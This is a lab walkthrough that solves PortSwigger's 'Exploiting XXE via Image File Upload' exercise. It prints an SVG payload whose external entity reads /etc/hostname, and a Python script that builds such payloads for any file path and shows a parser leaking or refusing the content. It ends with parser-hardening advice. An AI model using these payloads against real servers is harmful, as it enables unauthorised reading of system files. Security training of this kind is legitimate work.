Exploiting XXE Via Image File Upload

Introduction

This is our 8th article on XML external entity (XXE) injection vulnerabilities. In this article, we will solve the PortSwigger Web Security lab “Exploiting XXE via Image File Upload.” If you haven’t read the earlier parts, you can search for them on our website.

Lab Description Of Exploiting XXE Via Image File Upload


In this lab, users can post comments in the comments section and attach an avatar to each comment. The uploaded avatar image is processed server-side by the Apache Batik library.

To solve the lab, we need to upload an image that, after processing, displays the contents of the “/etc/hostname” file. Once we can read the hostname from the rendered avatar, we submit that value to complete the lab.

Lab Solution


First, open the lab. Once it loads, open any blog post.

As you can see, we have the option to comment, and we can also attach an avatar. We will exploit this lab using the avatar feature.

First, we need to create an SVG file.


I have already created a file named “exploit.svg” on my system, which we will use to exploit this vulnerability.

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Above is the code that you need to copy and save as “exploit.svg” on your system.

If you understand XML, the code is easy to read. SVG is an XML format, so it can carry a DOCTYPE. The DOCTYPE declares an external general entity named “xxe” whose SYSTEM identifier is “file:///etc/hostname”, and the <text> element references that entity with &xxe;. When the lab server parses the SVG with Batik, the parser resolves the external entity, substitutes the contents of /etc/hostname into the <text> element, and renders that string into the avatar image. Now it’s time to exploit this vulnerability using this code.
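To make the mechanism concrete, here is an added example (not code from the original article or from the lab) that builds the same payload for any target path and runs it through Python’s expat parser in two configurations: one that resolves file:// SYSTEM entities, which is the behaviour the lab’s Batik pipeline exhibits, and one that refuses them. The “hostname” is a constructed value written to a temporary file; the script never reads the real /etc/hostname, and it assumes POSIX-style paths.

```python
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


def build_svg_payload(target_path: str) -> str:
    """Same payload as exploit.svg, parameterised on the file to read.

    The DOCTYPE declares an external general entity whose SYSTEM identifier
    is a file:// URL, and <text> references it, so any parser that resolves
    external entities substitutes the file contents into the text node."""
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file://{target_path}" > ]>'
        '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        '<text font-size="16" x="0" y="16">&xxe;</text></svg>'
    )


def extract_text(svg: str, resolve_external: bool):
    """Parse the SVG with expat and return the character data inside <text>.

    resolve_external=True imitates a parser that fetches SYSTEM entities
    from disk (what the lab relies on); False imitates a hardened parser
    that refuses them, in which case None is returned."""
    parser = expat.ParserCreate()
    collected = []
    inside_text = False

    def start(name, attrs):
        nonlocal inside_text
        if name == "text":
            inside_text = True

    def end(name):
        nonlocal inside_text
        if name == "text":
            inside_text = False

    def chars(data):
        if inside_text:
            collected.append(data)

    def external_ref(context, base, system_id, public_id):
        url = urlparse(system_id)
        if not resolve_external or url.scheme != "file":
            return 0  # expat turns 0 into XML_ERROR_EXTERNAL_ENTITY_HANDLING
        with open(url.path, "rb") as fh:
            body = fh.read()
        # A child parser inherits the parent's handlers, so the file's bytes
        # reach chars() exactly as if they had been written in the document.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.ExternalEntityRefHandler = external_ref
    try:
        parser.Parse(svg.encode(), True)
    except expat.ExpatError:
        return None
    return "".join(collected).strip()


def demo(secret: bytes = b"b10cde35944c\n"):
    """Write a constructed stand-in for /etc/hostname to a temp file and run
    the payload through both parser configurations."""
    with tempfile.NamedTemporaryFile("wb", delete=False) as fh:
        fh.write(secret)
        path = fh.name
    try:
        svg = build_svg_payload(path)
        return extract_text(svg, True), extract_text(svg, False)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("resolving parser put this into <text>:", leaked)
    print("refusing parser put this into <text>:", blocked)
```

The resolving configuration ends up with the file contents as the text node, which is exactly what Batik then rasterises into the avatar; the refusing configuration fails the parse instead. The defensive takeaway is the same for any XML-based image pipeline: treat SVG as XML, and configure the parser to disallow DOCTYPE declarations or external entity resolution (on Java SAX parsers, the `http://apache.org/xml/features/disallow-doctype-decl` feature) before handing user uploads to it.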


Now I fill in the comment form, attach “exploit.svg” as the avatar, and click the “Post Comment” button to see what happens. A message on the screen says “Thank you for your comment,” indicating that our comment has been posted. Now, let’s check the post and see how our comment appears. I will click on “Back to Blog.”


You can see my comment at the end of the post. The two screenshots are shown side by side: I right-clicked on my avatar and opened it in a new window. The rendered image shows the text “b10cde35944c”. That is the contents of /etc/hostname, i.e. the server’s hostname, substituted into the <text> element by the entity reference. Now we submit this hostname as the solution.


As you can see, we have successfully solved the PortSwigger Web Security lab “Exploiting XXE via Image File Upload.” Congratulations!

If you want to learn more about web security, you can explore our website and click on the “Web Security” section in the Cyber Security menu. There you will find everything related to web security.
